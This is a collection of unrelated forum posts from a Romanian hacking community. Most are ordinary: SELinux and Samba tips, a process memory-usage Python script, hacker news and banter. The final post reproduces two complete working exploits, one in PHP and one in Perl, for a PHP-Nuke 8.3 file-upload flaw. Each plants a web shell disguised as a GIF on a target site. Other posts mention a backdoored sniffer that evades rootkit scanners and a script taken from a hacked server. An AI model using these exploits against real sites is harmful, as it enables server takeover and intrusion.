Zatarra

Daca ai SELinuxul activat orice ai face nu poti face share oriunde. Trebuie sa dai una din comenzile astea 2 pentru solutie temporara setsebool -P samba_export_all_rw on (pentru permisiuni rw pe share) setsebool -P samba_export_all_ro on (pentru permisiuni ro pe share) Si una din astea 2 pentru solutie permanenta echo "samba_export_all_rw=1" >> /etc/selinux/config (pentru permisiuni rw pe share) echo "samba_export_all_ro=1" >> /etc/selinux/config (pentru permisiuni ro pe share) Am detaliat mai mult aici: http://rstcenter.com/forum/35818-linux-sharing-using-samba.rst

Eu am avut mari probleme cu SELinux cand implementam samba.. deoarece nu te lasa sa dai share la foldere cu path-uri diverse.. doar /home /tmp si chestii de genu. Mai multe detalii gasesti aici:

1. Nu recomand inchiderea SELinuxului 2. ls –l /etc/rc.d/rc3.d/S* le afiseaza doar pe cele din runlevel 3 3. chkconfig --list nu chkconfig simplu 4. Legat de rootkit eu am sniffer cu bd inclus care nu e detectat de RK Hunter, cu toate astea ramane un anti rk bun. 5. Sustin faza cu clamav. 6. As mai adauga o securitate folosind TCPWrappers (un eventual help aici) 7. Bravo pentru tutorial, +1 pentru ca a fost facut de tine. 8. Sper sa continui tot asa si la cat mai multe tutoriale de genul

Tu esti shemale! On: Da, cum zicea Nytro - au fost, sunt si vor fii

Doar pe Linux si pe FreeBSD uname=os.uname() if uname[0]=="FreeBSD": proc="/compat/linux/proc/" else: proc="/proc/"

Nu stiam ce titlu sa ii dau.. Am sa fiu cat de scurt se poate.. programul iti zice fiecare proces cata memorie consuma, e foarte dragut. #!/usr/bin/env python # Try to determine how much RAM is currently being used per program. # Note per _program_, not per process. So for example this script # will report RAM used by all httpd process together. In detail it reports: # sum(private RAM for program processes) + sum(Shared RAM for program processes) # The shared RAM is problematic to calculate, and this script automatically # selects the most accurate method available for your kernel. # Author: P@draigBrady.com # Source: http://www.pixelbeat.org/scripts/ps_mem.py # V1.0 06 Jul 2005 Initial release # V1.1 11 Aug 2006 root permission required for accuracy # V1.2 08 Nov 2006 Add total to output # Use KiB,MiB,... for units rather than K,M,... # V1.3 22 Nov 2006 Ignore shared col from /proc/$pid/statm for # 2.6 kernels up to and including 2.6.9. # There it represented the total file backed extent # V1.4 23 Nov 2006 Remove total from output as it's meaningless # (the shared values overlap with other programs). # Display the shared column. This extra info is # useful, especially as it overlaps between programs. # V1.5 26 Mar 2007 Remove redundant recursion from human() # V1.6 05 Jun 2007 Also report number of processes with a given name. # Patch from riccardo.murri@gmail.com # V1.7 20 Sep 2007 Use PSS from /proc/$pid/smaps if available, which # fixes some over-estimation and allows totalling. # Enumerate the PIDs directly rather than using ps, # which fixes the possible race between reading # RSS with ps, and shared memory with this program. # Also we can show non truncated command names. # V1.8 28 Sep 2007 More accurate matching for stats in /proc/$pid/smaps # as otherwise could match libraries causing a crash. # Patch from patrice.bouchand.fedora@gmail.com # V1.9 20 Feb 2008 Fix invalid values reported when PSS is available. # Reported by Andrey Borzenkov <arvidjaar@mail.ru> # V2.4 06 Mar 2011 # http://github.com/pixelb/scripts/commits/master/scripts/ps_mem.py # Notes: # # All interpreted programs where the interpreter is started # by the shell or with env, will be merged to the interpreter # (as that's what's given to exec). For e.g. all python programs # starting with "#!/usr/bin/env python" will be grouped under python. # You can change this by using the full command line but that will # have the undesirable affect of splitting up programs started with # differing parameters (for e.g. mingetty tty[1-6]). # # For 2.6 kernels up to and including 2.6.13 and later 2.4 redhat kernels # (rmap vm without smaps) it can not be accurately determined how many pages # are shared between processes in general or within a program in our case: # http://lkml.org/lkml/2005/7/6/250 # A warning is printed if overestimation is possible. # In addition for 2.6 kernels up to 2.6.9 inclusive, the shared # value in /proc/$pid/statm is the total file-backed extent of a process. # We ignore that, introducing more overestimation, again printing a warning. # Since kernel 2.6.23-rc8-mm1 PSS is available in smaps, which allows # us to calculate a more accurate value for the total RAM used by programs. # # Programs that use CLONE_VM without CLONE_THREAD are discounted by assuming # they're the only programs that have the same /proc/$PID/smaps file for # each instance. This will fail if there are multiple real instances of a # program that then use CLONE_VM without CLONE_THREAD, or if a clone changes # its memory map while we're checksumming each /proc/$PID/smaps. # # I don't take account of memory allocated for a program # by other programs. For e.g. memory used in the X server for # a program could be determined, but is not. # # FreeBSD is supported if linprocfs is mounted at /compat/linux/proc/ # FreeBSD 8.0 supports up to a level of Linux 2.6.16 import sys, os, errno, string try: # md5 module is deprecated on python 2.6 # so try the newer hashlib first import hashlib md5_new = hashlib.md5 except ImportError: import md5 md5_new = md5.new # The following exits cleanly on Ctrl-C or EPIPE # while treating other exceptions as before. def std_exceptions(etype, value, tb): sys.excepthook=sys.__excepthook__ if issubclass(etype, KeyboardInterrupt): pass elif issubclass(etype, IOError) and value.errno == errno.EPIPE: pass else: sys.__excepthook__(etype, value, tb) sys.excepthook=std_exceptions if os.geteuid() != 0: sys.stderr.write("Sorry, root permission required.\n"); if __name__ == '__main__': sys.stderr.close() sys.exit(1) uname=os.uname() if uname[0]=="FreeBSD": proc="/compat/linux/proc/" else: proc="/proc/" split_args=False if len(sys.argv)==2 and sys.argv[1] == "--split-args": split_args = True PAGESIZE=os.sysconf("SC_PAGE_SIZE")/1024 #KiB our_pid=os.getpid() #(major,minor,release) def kernel_ver(): kv=open(proc+"sys/kernel/osrelease", "rt").readline().split(".")[:3] for char in "-_": kv[2]=kv[2].split(char)[0] return (int(kv[0]), int(kv[1]), int(kv[2])) try: kv=kernel_ver() except (IOError, OSError), value: if value.errno == errno.ENOENT: sys.stderr.write( "Couldn't access /proc\n" "Only GNU/Linux and FreeBSD (with linprocfs) are supported\n") sys.exit(2) else: raise have_pss=0 #return Private,Shared #Note shared is always a subset of rss (trs is not always) def getMemStats(pid): global have_pss mem_id = pid #unique Private_lines=[] Shared_lines=[] Pss_lines=[] Rss=int(open(proc+str(pid)+"/statm", "rt").readline().split()[1])*PAGESIZE if os.path.exists(proc+str(pid)+"/smaps"): #stat digester = md5_new() for line in open(proc+str(pid)+"/smaps", "rb").readlines(): #open # Note we checksum smaps as maps is usually but # not always different for separate processes. digester.update(line) line = line.decode("ascii") if line.startswith("Shared"): Shared_lines.append(line) elif line.startswith("Private"): Private_lines.append(line) elif line.startswith("Pss"): have_pss=1 Pss_lines.append(line) mem_id = digester.hexdigest() Shared=sum([int(line.split()[1]) for line in Shared_lines]) Private=sum([int(line.split()[1]) for line in Private_lines]) #Note Shared + Private = Rss above #The Rss in smaps includes video card mem etc. if have_pss: pss_adjust=0.5 #add 0.5KiB as this average error due to trunctation Pss=sum([float(line.split()[1])+pss_adjust for line in Pss_lines]) Shared = Pss - Private elif (2,6,1) <= kv <= (2,6,9): Shared=0 #lots of overestimation, but what can we do? Private = Rss else: Shared=int(open(proc+str(pid)+"/statm", "rt").readline().split()[2]) Shared*=PAGESIZE Private = Rss - Shared return (Private, Shared, mem_id) def getCmdName(pid): cmdline = open(proc+"%d/cmdline" % pid, "rt").read().split("\0") if cmdline[-1] == '' and len(cmdline) > 1: cmdline = cmdline[:-1] path = os.path.realpath(proc+"%d/exe" % pid) #exception for kernel threads if split_args: return " ".join(cmdline) if path.endswith(" (deleted)"): path = path[:-10] if os.path.exists(path): path += " [updated]" else: #The path could be have prelink stuff so try cmdline #which might have the full path present. This helped for: #/usr/libexec/notification-area-applet.#prelink#.fX7LCT (deleted) if os.path.exists(cmdline[0]): path = cmdline[0] + " [updated]" else: path += " [deleted]" exe = os.path.basename(path) cmd = open(proc+"%d/status" % pid, "rt").readline()[6:-1] if exe.startswith(cmd): cmd=exe #show non truncated version #Note because we show the non truncated name #one can have separated programs as follows: #584.0 KiB + 1.0 MiB = 1.6 MiB mozilla-thunder (exe -> bash) # 56.0 MiB + 22.2 MiB = 78.2 MiB mozilla-thunderbird-bin return cmd cmds={} shareds={} mem_ids={} count={} for pid in os.listdir(proc): if not pid.isdigit(): continue pid = int(pid) if pid == our_pid: continue try: cmd = getCmdName(pid) except: #permission denied or #kernel threads don't have exe links or #process gone continue try: private, shared, mem_id = getMemStats(pid) except: continue #process gone if shareds.get(cmd): if have_pss: #add shared portion of PSS together shareds[cmd]+=shared elif shareds[cmd] < shared: #just take largest shared val shareds[cmd]=shared else: shareds[cmd]=shared cmds[cmd]=cmds.setdefault(cmd,0)+private if cmd in count: count[cmd] += 1 else: count[cmd] = 1 mem_ids.setdefault(cmd,{}).update({mem_id:None}) #Add shared mem for each program total=0 for cmd in cmds: cmd_count = count[cmd] if len(mem_ids[cmd]) == 1 and cmd_count > 1: # Assume this program is using CLONE_VM without CLONE_THREAD # so only account for one of the processes cmds[cmd] /= cmd_count if have_pss: shareds[cmd] /= cmd_count cmds[cmd]=cmds[cmd]+shareds[cmd] total+=cmds[cmd] #valid if PSS available if sys.version_info >= (2, 6): sort_list = sorted(cmds.items(), key=lambda x:x[1]) else: sort_list = cmds.items() sort_list.sort(lambda x,y:cmp(x[1],y[1])) # list wrapping is redundant on <py3k, needed for >=pyk3 however sort_list=list(filter(lambda x:x[1],sort_list)) #get rid of zero sized processes #The following matches "du -h" output #see also human.py def human(num, power="Ki"): powers=["Ki","Mi","Gi","Ti"] while num >= 1000: #4 digits num /= 1024.0 power=powers[powers.index(power)+1] return "%.1f %s" % (num,power) def cmd_with_count(cmd, count): if count>1: return "%s (%u)" % (cmd, count) else: return cmd if __name__ == '__main__': sys.stdout.write(" Private + Shared = RAM used\tProgram \n\n") for cmd in sort_list: sys.stdout.write("%8sB + %8sB = %8sB\t%s\n" % (human(cmd[1]-shareds[cmd[0]]), human(shareds[cmd[0]]), human(cmd[1]), cmd_with_count(cmd[0], count[cmd[0]]))) if have_pss: sys.stdout.write("%s\n%s%8sB\n%s\n" % ("-" * 33, " " * 24, human(total), "=" * 33)) sys.stdout.write("\n Private + Shared = RAM used\tProgram \n\n") # We must close explicitly, so that any EPIPE exception # is handled by our excepthook, rather than the default # one which is reenabled after this script finishes. sys.stdout.close() #Warn of possible inaccuracies #2 = accurate & can total #1 = accurate only considering each process in isolation #0 = some shared mem not reported #-1= all shared mem not reported def shared_val_accuracy(): """http://wiki.apache.org/spamassassin/TopSharedMemoryBug""" if kv[:2] == (2,4): if open(proc+"meminfo", "rt").read().find("Inact_") == -1: return 1 return 0 elif kv[:2] == (2,6): pid = str(os.getpid()) if os.path.exists(proc+pid+"/smaps"): if open(proc+pid+"/smaps", "rt").read().find("Pss:")!=-1: return 2 else: return 1 if (2,6,1) <= kv <= (2,6,9): return -1 return 0 else: return 1 if __name__ == '__main__': vm_accuracy = shared_val_accuracy() if vm_accuracy == -1: sys.stderr.write( "Warning: Shared memory is not reported by this system.\n" ) sys.stderr.write( "Values reported will be too large, and totals are not reported\n" ) elif vm_accuracy == 0: sys.stderr.write( "Warning: Shared memory is not reported accurately by this system.\n" ) sys.stderr.write( "Values reported could be too large, and totals are not reported\n" ) elif vm_accuracy == 1: sys.stderr.write( "Warning: Shared memory is slightly over-estimated by this system\n" "for each program, so totals are not reported.\n" ) sys.stderr.close() Sursa.. un server hackuit.. dar din descriere cica ar fii si aici

Da codu ca testam noi

Verificarea mea cam asta ar fii.. <?php $i=2; //Initializam i cu 2 deoarece prima verificare are loc dupa apelarea functiei de 2 ori $check=hash('crc32','a'); //Retinem prima valoare (pentru if) $crack=hash('crc32','a'); //Initializam prima valoare inafara while-ului while (1) { $crack=hash('crc32',$crack); //Apelarea functiei if ($crack==$check) {echo $i;break;} //Afisam contor $i++; //Contorul } ?> Am sa las un server sa calculeze, sa vad daca ajunge la un rezultat.. dar nu cred..

Asta`i ala cu care au fost atacati atunci iranieni? De le`o busit apratele de la centrale nucleare sau ce dracu de centrale au ei. @UserPi buna observatie

Zi mersi.. oricum felicitari

Povestea lui Ryan, hackerul autist, este una cel putin ciudata. Tanarul traieste complet izolat de lumea reala. Nu isi paraseste mai nicioadata casa. Isi petrecea saptamani intregi in fata calculatorului, in camera sa, cu draperiile trase, singura lumina in incapere fiind cea facuta de computer. Nici mama lui nu il deranjeaza. Ii lasa mereu mancare la usa. Traind atat de izolat de lume nimeni nu s-ar fi gandit ca Ryan ar putea avea o iubita. Insa are. Amy Chapman, in varsta de 19 ani. Cei doi au o relatie cu totul neobisnuita. Nu ies in oras, nu merg la film sau la plimbari prin parc. Ei isi petrec tot timpul in fata calculatorului, navigand pe internet, inchisi in camera tanarului. Relatia lor se desfasoara intr-o lume digitala, o lume in care cei doi indragostiti se simt in largul lor si pot face tot ce isi doresc. “Suntem fideli unul altuia pentru ca nu cunoastem pe nimeni altcineva. Daca el ar vrea sa cunoasca o alta fata, eu l-as incuraja. Nu sunt deloc geloasa”, a declarat iubita hackerului. “Nu-mi place termenul de iubita. Sa zicem ca ne indeplinim unul altuia toate nevoile sexuale”, a mai spus fata. Ryan nu i-a cumparat niciodata un cadou de ziua ei sau de Craciun. Singura atentie pe care i-a facut-o a fost un hard disc pentru computer. Ryan a ajuns in fata justitiei sub acuzatia ca a spart site-ul mai multor agentii oficiale din SUA si Anglia. Pentru ca este autist, judecatorul Nicholas Evans a decis sa-l elibereze pe Cleary pe cautiune. El nu are insa voie sa acceseze internetul in aceasta perioada. Cazul lui Ryan aminteste de cel al unui alt englez, Gary McKinnon, care sufera de aceeasi boala, si care ar putea fi extradat in SUA dupa ce a atacat computerele armatei americane. Cleary este invinuit ca a atacat, printre altele, site-ul SOCA (Serious Organised Crime Agency). El este acuzat ca a pus la cale construirea unei retele "Botnet", pentru a infecta calculatoare cu virusi. In plus, a recunoscut ca a reusit sa sparga sistemele de securitate ale NASA si Pentagonului, dar a declarat ca nu voia sa caute decat probe ca exista extraterestri. Cleary face parte din LulzSec, un grup devenit cunoscut prin atacurile impotriva site-urilor de jocuri video ale Sony si Nintendo si care a revendicat si atacuri asupra canalului de televiziune public american PBS, a companiei Sony, a canalului TV Fox, a unor site-uri pornografice, a FBI, CIA si guvernului american. Hackerii au vizat si site-urile presedintiei si guvernului brazilian, dar si ale politiei britanice. O noua audiere in cazul lui Ryan va avea loc luna viitoare. Amy ii va fi alaturi la tribunal. Sursa: ?Nu as putea sa o insel. Nu cunosc pe nimeni altcineva?. Povestea hackerului autist www.stirileprotv.ro

Nu s`au afisat pt cine ma intereseaza pe mine

Cand se afiseaza rezultatele?

Kw3 sper ca tu misti p'acilea, dracia chiar functioneaza

Kw3 n`ai somn si ai zis sa stai sa-ti bati capu cu chatu? Macar gatleju sa nu`tzi fie uscat

Bine ai venit, in primul rand te-as ruga sa arunci un ochi peste regulile care domina pe aici (mai mult sau mai putin). Iar in al doilea rand te-as ruga sa postezi orice nelamurire ai sau chiar orice informatie pe care o detii in domeniul intereselor tale, niciodata nu se stie ce putem invata de la tine. Ca un mic sfat, asigura-te ca ceea ce postezi nu a mai fost deja postat. Sper sa ramai printre noi si sa contribui cu ceea ce poti la comunitate.

Uite aici, primele 2 pagini de articole: Copiate: http://blog.spargetot.ro/google-un-rival-pentru-facebook/ http://blog.spargetot.ro/numarul-utilizatorilor-de-internet-in-romania/ http://blog.spargetot.ro/japonezii-au-creat-un-calculator-cu-68-544-procesoare/ http://blog.spargetot.ro/laptop-sony-vaio-z/ http://blog.spargetot.ro/pozezi-acum-focalizezi-mai-tarziu/ http://blog.spargetot.ro/apple-ipad-2-va-fi-lansat-vineri-oficial-in-romania/ http://blog.spargetot.ro/incet-incet-o-sa-scapam-de-grija-driverelor/ http://blog.spargetot.ro/trabant-acoperit-cu-gazon/ http://blog.spargetot.ro/facebook-pierde-milioane-de-utilizatori/ http://blog.spargetot.ro/samsung-mai-tare-ca-nokia-si-apple-la-smartphone-uri/ http://blog.spargetot.ro/repeat-pe-youtube-la-nesfarsit/ http://blog.spargetot.ro/ios-5-te-poate-transforma-in-magician/ http://blog.spargetot.ro/urmatorul-playstation-portable-se-va-numi-ps-vita/ http://blog.spargetot.ro/se-copiaza-sau-nu-la-bacalaureat-2011/ http://blog.spargetot.ro/microsoft-a-prezentat-in-detaliu-sistemul-de-operare-windows-8-video/ http://blog.spargetot.ro/ce-tastatura-au-cei-de-la-cancan/ http://blog.spargetot.ro/patinoarul-flamaropol-va-fi-daramat/ http://blog.spargetot.ro/radiatiile-de-la-telefoanele-celulare-pot-cauza-cancerul/ http://blog.spargetot.ro/powermat-solutia-wireless-pentru-incarcarea-gadgeturilor-tale/ http://blog.spargetot.ro/apacer-lanseaza-stick-usb-3-0/ http://blog.spargetot.ro/verbatim-blu-ray-bd-r-tip-lth-de-25gb/ http://blog.spargetot.ro/se-lungesc-vacantele-scoala-nu-mai-incepe-pe-15-septembrie/ http://blog.spargetot.ro/asocierea-numarului-11-cu-atentatele-din-11-septembrie-2001/ http://blog.spargetot.ro/genius-ring-mouse-un-nou-mod-de-a-da-click/ http://blog.spargetot.ro/tableta-htc-flyer-este-disponibila-si-in-romania/Ale tale: http://blog.spargetot.ro/ce-o-sa-reziste-mult-si-bine-pe-internet/ http://blog.spargetot.ro/protectie-web-pentru-android-incepem-sa-avem-nevoie-de-asa-ceva/ http://blog.spargetot.ro/ce-poti-sa-patesti-daca-cumperi-hdd-din-targ/ http://blog.spargetot.ro/hahaha-fac-glume-cei-de-la-realitatea-net/Hai sa iti zic eu proverb: Imi e sila sa demonstrez oamenilor ca tine cat de penali sunt. Numai bine!

Voi nu stiti ce vorbiti.. vi e baza in tot ceea ce inseamna UNIX. Il gasesti in orice tip de shell, orice tip de UNIX, eu unul il ador. Are o groaza de scuraturi, pe care bineinteles, trebuie sa le stii si o groaza de avantaje. E adevarat ca la inceput iti da bataie de cap, dar daca sti sa te documentezi ii dai usor de cap. BTW: Threadu asta chiar sucks, si sucks rau.. comenzi aruncate asa la vrajeala.. sper sa nu se mai iveasca "hackerasi" de genul acesta.

Hai ca mai furi un telefon, un carucior de copii, dar rotile de la masina?

Te inseli, il foloseste pe cel care il ai tu setat default. Daca nu crezi incearca cu un script de genu asta: <?php echo $_SERVER['HTTP_USER_AGENT'] . "\n\n"; $browser = get_browser(null, true); print_r($browser); ?>

Salut si bun venit pe la noi. Dupa cum spunea si wildchild si eu te sfatuiesc sa pui orice fel de intrebare, trasnita sau nu, pe care o ai fara sa ai nici o retinere. Si da, este adevarat, pe forum avem si exemple 'asa nu' dar sunt si multi care au cunostinte vaste in anumite domenii si daca ai o problema te vor ajuta. Sper sa contribui si tu cu ce poti la comunitate, orice intiativa proprie e privita cu ochi buni.

Warning: curl_setopt() [function.curl-setopt]: Invalid curl configuration option in /home/net/public_html/*****/do_xss_scanner.php on line 121 Warning: curl_setopt() [function.curl-setopt]: Invalid curl configuration option in /home/net/public_html/*****/do_sqli_scanner.php on line 155 Inca mai ai bug`uri Edit: @pr00f ms, nu am observat Edit2: Voi chiar credeti ca sunt atat de genii baietii? eu cred ca`i mai usor sa decripteze hash`urile

Ui aici mindfuck:

E awsome, ar fi binevenita o schimbare a banner-ului, dar deocamdata zic sa se mai faca brainstorming pe ideea asta, poate se obtine ceva belea rau. P.S. ;-)

PHP exploit: <?php /////////////////////////////////////////////////// #Iranian Pentesters Home #PHP Nuke 8.3 MT AFU Vulnerability #Coded by:4n0nym0us & b3hz4d #http://www.pentesters.ir /////////////////////////////////////////////////// //Settings: $address = 'http://your-target.com'; $file = 'shell.php.01'; $prefix='pentesters_'; //Exploit: @$file_data = "\x47\x49\x46\x38\x39\x61\x05\x00\x05\x00"; @$file_data .= file_get_contents($file); file_put_contents($prefix . $file, $file_data); $file = $prefix . $file; echo "\n" . "///////////////////////////////////" ."\n"; echo " Iranian Pentesters Home" . "\n"; echo " PHP Nuke 8.3 MT RFU Vulnerability" . "\n"; echo "///////////////////////////////////" ."\n"; $address_c = $address . '/includes/richedit/upload.php'; $postdata = array("userfile" => "@$file;type=image/gif","upload" => "1","path" => "images","pwd" => "1"); $data = post_data($address_c, $postdata); $start = strpos($data, "<img src=\"upload"); if ($start != null) { $data = substr($data,$start + 10); $end = strpos($data, "\""); $data = substr($data,0,$end); echo "\n" . "Uploaded File: " . $address . "/includes/richedit/" . $data . "\n"; } else echo "\n" . "Upload Failed!!!"; function post_data($address, $data) { $curl = curl_init($address); curl_setopt($curl, CURLOPT_USERAGENT, "Opera/9.0 (Windows NT 5.0; U; en)"); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_POSTFIELDS, $data); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); $content = curl_exec($curl); curl_close($curl); return $content; } ?> PERL exploit #!/usr/bin/perl ################################################### #//Iranian Pentesters Home #//PHP Nuke 8.3 MT AFU Vulnerability #//Coded by:4n0nym0us & b3hz4d #//http://www.pentesters.ir ################################################### use LWP; use HTTP::Request::Common; print "\n" . "///////////////////////////////////" ."\n"; print " Iranian Pentesters Home" . "\n"; print " PHP Nuke 8.3 MT AFU Vulnerability" . "\n"; print "///////////////////////////////////" ."\n"; print "\n" . "Syntax: perl xpl.pl http://your-target.com shell.php.01 [prefix]" . "\n\n"; my $url = $ARGV[0]."/includes/richedit/upload.php"; my $filename = $ARGV[1]; my $prefix = $ARGV[2]; my $rfile = $prefix . $filename . ".gif"; open fhandle, $ARGV[1] or die $!; while (<fhandle>){ $shell .= $_; } close fhandle; open fhandle, ">", $rfile or die $!; print fhandle "\x47\x49\x46\x38\x39\x61\x05\x00\x05\x00"."\n".$shell; close(fhandle); my $ua = LWP::UserAgent->new; $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.12) Gecko/20101026"); my $req = POST $url, Content_Type => 'form-data', Content => [ upload => "1", path => 'images', pwd => "1", userfile => [ $rfile,$prefix . $filename ] ]; my $res = $ua->request($req); $between=substr($res->as_string(), index($res->as_string(), '<img src="upload/')+10, index($res->as_string(), 'onclick="self.parent.') - index($res->as_string(), '<img src="upload/')-12); print("Uploaded File: " . $ARGV[0]."/includes/richedit/".$between); exit; Sursa: PHP Nuke 8.3 MT Shell Upload ? Packet Storm Video: Download - 213.mp4 - Persiangig